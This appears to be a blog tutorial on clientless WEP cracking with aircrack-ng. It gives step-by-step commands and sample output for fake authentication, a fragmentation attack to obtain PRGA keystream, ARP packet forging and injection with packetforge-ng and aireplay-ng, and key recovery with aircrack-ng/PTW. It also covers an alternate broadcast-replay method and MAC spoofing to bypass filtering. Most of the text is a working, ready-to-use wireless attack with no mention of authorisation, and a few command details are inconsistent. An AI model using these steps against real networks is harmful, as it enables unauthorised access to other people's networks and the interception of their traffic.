Clientless WEP Cracking
Before Starting, Ensure:

Your hardware supports packet injection. You can verify this by using Wireshark.

You are within range of an ap. Just because you can see packets transmitted from the ap, doesn't mean you can send them to the ap if the distance is too great. Usually card strength is less than that of the transmit power of an ap.

The ap is transmitting.

The ap is using WEP with Open Authentication. If SKA(Shared Key Authentication) is being used, you must have captured the PRGA xor data previously.

You are using v0.8 of aircrack-ng. Other versions may need different command variations.

Equipment used:
MAC of card doing the injecting: 00:11:22:33:44
BSSID (AP's MAC): 13:13:13:13:13
ESSID (Wireless network name): TEST
Access point channel: 9
Wireless interface: rausb0

Solution Overview

Here are the basic steps we will be going through:
1 - Start wireless interface on monitor mode on correct channel
2 - Fake authenticate using aireplay-ng with the -1 option
3 - Initiate a fragmention attack to obtain a PRGA
4 - Use packetforge-ng to make an arp packet using the PRGA previously obtained
5 - Use airodump-ng to capture IVs
6 - Inject the arp packet created by packetforge-ng in step 4
7 - Run aircrack-ng/ptw to crack WEP key

Step 1 - Start the wireless interface in monitor mode on AP channel

Enter the following command to start the wireless card on channel 9 in monitor mode:
airmon-ng start wifi0 9 -Use this page if you want to convert the frequency to channel number.

Troubleshooting Tips:

If another interface started other then rausb0 then you can use that one or use “airomon-ng stop athX” where X is each interface you want to stop.

Step 2 - Use aireplay-ng to do a fake authentication with the access point

An ap will not accept a packet from a MAC that is not associated with it. If the source MAC address you are injecting is not associated, the AP ignores the packet and sends out a “DeAuthentication” packet. No new IVs are created in this situation as the AP is ignoring any packets with the unassociated MAC in them.

Use aireplay-ng to fake authenticate to an AP.
aireplay-ng -1 0 -e TEST -a 13:13:13:13:13 -h 00:11:22:33:44 eth1

-1 means fake authentication
0 reassociation timing in seconds
-e TEST is the wireless network name
-a 13:13:13:13:13 is the access point MAC address
-h 00:11:22:33:44 is our card MAC addresss
rausb0 is the wireless interface name
Success looks like:
18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)

Or another variation for picky access points:
aireplay-ng -1 6000 -o 1 -q 10 -e TEST -a 13:13:13:13:13 -h 00:11:22:33:44 eth1

6000 - Reauthenticate very 6000 seconds. The long period also causes keep alive packets to be sent.
-o 1 - Send only one set of packets at a time. Default is multiple and this confuses some APs.
-q 10 - Send keep alive packets every 10 seconds.
18:22:32 Sending Authentication Request
18:22:32 Authentication successful
18:22:32 Sending Association Request
18:22:32 Association successful :-)
18:22:42 Sending keep-alive packet
18:22:52 Sending keep-alive packet
# and so on.
Failed authentication:
8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request

Do NOT proceed beyond this step if fake authentication is not working.

Troubleshooting Tips:
Some APs implement MAC filtering. In this case, it is necessary to know one of the MACs of any computers that use the target Access Point. Use macchanger to spoof MACs.

Step 3 - Use aireplay-ng chopchop or fragmenation attack to obtain PRGA

The objective of the chopchop and fragmentation attacks is to obtain a PRGA (pseudo random genration algorithm) bit file. It is not the WEP key itself, nor can it decrypt packets. However, it is used to create new packets. You can use chopchop or fragmention attacks to obtain a PRGA. When one attack doesn't work against an AP, use the other one. Visit to see the pros and cons of each attack.

Fragmentation attack:
aireplay-ng -5 -b 13:13:13:13:13 -h 00:11:22:33:44 rausb0
-5 means the fragmentation attack
-b 13:13:13:13:13 is the access point MAC address
-h 00:11:22:33:44 is the MAC address of our card and must match the MAC used in the fake authentication
rausb0 is the wireless interface name
The system will respond:
aireplay-ng -5 -b 13:13:13:13:13 -h 00:11:22:33:44 rausb0
Waiting for a data packet...
Read 127 packets...

Size: 114, FromDS: 1, ToDS: 0 (WEP)

BSSID = 13:13:13:13:13
Dest. MAC = 01:00:5E:00:00:FB
Source MAC = 00:40:F4:77:E5:C9

0x0000: 0842 0000 0100 5e00 00fb 0014 6c7e 4080 .B....^.....l~@.
0x0010: 0040 f477 e5c9 6052 8c00 0000 3073 d265 .@.w..`R....0s.e
0x0020: c402 790b 2293 c7d5 89c5 4136 7283 29df ..y.".....A6r.).
0x0030: 4e9e 5e13 5f43 4ff5 1b37 3ff9 4da4 c03b N.^._CO..7?.M..;
0x0040: 8244 5882 d5cc 7a1f 2b9b 3ef0 ee0f 4fb5 .DX...z.+.>...O.
0x0050: 4563 906d 0d90 88c4 5532 a602 a8ea f8e2 Ec.m....U2......
0x0060: c531 e214 2b28 fc19 b9a8 226d 9c71 6ab1 .1..+(...."m.qj.
0x0070: 9c9f ..

Use this packet ? y
When a packet from the access point arrives, enter “y” to proceed. You may need to try a few to be successful.
When successful, the system reponds:
Saving chosen packet in replay_src-0203-180328.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0203-180343.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
Success! The file “fragment-0203-180343.xor” can then be used in the next step to generate an arp packet.
Troubleshooting Tips
Sometimes the first packet won't work. Try a few more. This goes for both attacks. Visit for more information on the chopchop attack.

Step 4 - Use packetforge-ng to create an arp packet

Use the PRGA from the last step. Look for the file ending in "xor". Packetforge-ng uses this PRGA to make an arp packet. Hopefully, when injected, the ap will rebroadcast it and a new IV can be obtained.
packetforge-ng -0 -a 13:13:13:13:13 -h 00:11:22:33:44 -k -l -y fragment-0203-180343.xor -w arp-request
-0 means generate an arp packet
-a 13:13:13:13:13 is the access point MAC address
-h 00:11:22:33:44 is MAC address of our card
-k is the destination IP (most APs respond to
-l is the source IP (most APs respond to
-y fragment-0203-180343.xor is file to read the PRGA from
-w arp-request is name of file to write the arp packet to
The system will respond:
Wrote packet to: arp-request

Step 5 - Start airodump-ng

Open another console session to capture the generated IVs. Then enter:
airodump-ng -c 9 --bssid 13:13:13:13:13 --ivs -w capture rausb0
-c 9 is the channel for the wireless network
- -bssid 13:13:13:13:13 is the access point MAC address. This eliminate extraneous traffic.
- -ivs specfifies that you only want to capture the IVs. This keeps the file as small as possible. (Do not use --ivs if you wish to crack using aircrack-ptw)
-w capture is file name prefix for the file which will contain the IVs.
rausb0 is the interface name.

Step 6 - Inject the arp packet

Using the console session where you generated the arp packet, enter:
aireplay-ng -2 -r arp-request rausb0
-2 means use interactive frame selection
-r arp-request defines the file name from which to read the arp packet
rausb0 defines the interface to use
The system will respond:
Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = 13:13:13:13:13
Source MAC = 00:09:5B:EC:EE:F2

0x0000: 0841 0201 0014 6c7e 4080 0009 5bec eef2 .A....l~@...[...
0x0010: ffff ffff ffff 8001 8f00 0000 7af3 8be4 ............z...
0x0020: c587 b696 9bf0 c30d 9cd9 c871 0f5a 38c5 ...........q.Z8.
0x0030: f286 fdb3 55ee 113e da14 fb19 17cc 0b5e ....U..>.......^
0x0040: 6ada 92f2 j...

Use this packet ? y
Enter “y” to use this packet. The system responds by showing how many packets it is injecting and reminds you to start airodumump if it has not already been started:
Saving chosen packet in replay_src-0204-104917.cap
You should also start airodump-ng to capture replies.

End of file.

While this command is successfully running, the airodump-ng screen will look similar to:
CH 9 ][ Elapsed: 16 s ][ 2007-02-04 11:04


13:13:13:13:13 47 100 179 2689 336 9 11 WEP WEP TEST

BSSID STATION PWR Lost Packets Probes

13:13:13:13:13 00:11:22:33:44 29 0 2707
Notice that the station packets are roughly equal to the BSSID data packets. This indicates injection is working well. The data rate of 336 packets per second is an indicator that the injection is working well.

Step 7 - Run aircrack-ng to obtain the WEP key

Start another console session and enter:
aircrack-ng *.ivs -b 13:13:13:13:13
*.ivs selects all files ending in “ivs”.
-b 13:13:13:13:13 selects the one access point we are interested in

You can run this while generating packets. Before long, the WEP key will be calculated displayed. You will need approximately 250,000 IVs for 64 bit and 1,500,000 IVs for 128bit keys. These are approximations. You may need more or less.

Troubleshooting Tips:
Sometimes you need to try various techniques to crack the WEP key. Try “-n” to set various key lengths. Use “-f” and try various fudge factors. Use “-k” and try disabling various korek methods.
(For Aircrack-ptw) enter:
aircrack-ng -z *.cap -b 13:13:13:13:13*
*Aircrack-ptw is specified by using the "z" switch to the aircrack-ng command. Also, ptw can only used .cap files.
Aircrack-ptw uses a different algorithm and cracks keys with a fraction of the data necessary. I've cracked 128 bit WEP with only 25k ivs.

Alternate Solution:
Here is a way that basically takes any packet broadcasted by the access point and converts it to a broadcast packet so that the AP generates a new IV.

The con to this technique is that if you receive a 1000 byte packet you then rebroadcast 1000 bytes. This can slow down the packet/sec rate substantially. The pro to this is that this process is simple. If you're lucky, you will get a small packet for rebroadcasting. With a small packet, this solution is comparable to the aforementioned process.

As always, fake authenticate first.
Enter the following command:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 13:13:13:13:13 -h 00:11:22:33:44 rausb0
-2 means use interactive frame selection
-p 0841 sets the Frame Control Field such that the packet looks like it is being sent from a wireless client.
c FF:FF:FF:FF:FF:FF sets the destination MAC address to be a broadcast. This is required to cause the AP to replay the packet and thus getting the new IV.
-b 13:13:13:13:13 is the access point MAC address
-h 00:11:22:33:44 is the MAC address of our card and must match the MAC used in the fake authentication
rausb0 defines the interface to use
The system will respond:
Read 698 packets...

Size: 86, FromDS: 1, ToDS: 0 (WEP)

BSSID = 13:13:13:13:13
Source MAC = 00:D0:CF:03:34:8C

0x0000: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@.
0x0010: 00d0 cf03 348c a0f4 2000 0000 e233 962a ....4... ....3.*
0x0020: 90b5 fe67 41e0 9dd5 7271 b8ed ed23 8eda ...gA...rq...#..
0x0030: ef55 d7b0 a56f bc16 355f 8986 a7ab d495 .U...o..5_......
0x0040: 1daa a308 6a70 4465 9fa6 5467 d588 c10c ....jpDe..Tg....
0x0050: f043 09f6 5418 .C..T.

Use this packet ? y
You enter “y” to select the packet and start injecting it. Remember, the smaller the packet, the better. You then start injecting:
Saving chosen packet in replay_src-0411-145110.cap

Sent 10204 packets...(455 pps)

If you have not already started airodump-ng, be sure to start it now. Once you have sufficient IVs, you can start aircrack-ng and attempt to crack the WEP key.

Another variation of this attack is to use packets from a previous capture. You must have captured the full packets, not just the IVs.
Here is what the command would look like:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 13:13:13:13:13 -h 00:11:22:33:44 -r capture-01.cap rausb0
Where " -r capture-01.cap” is data from a previous capture.


Post a Comment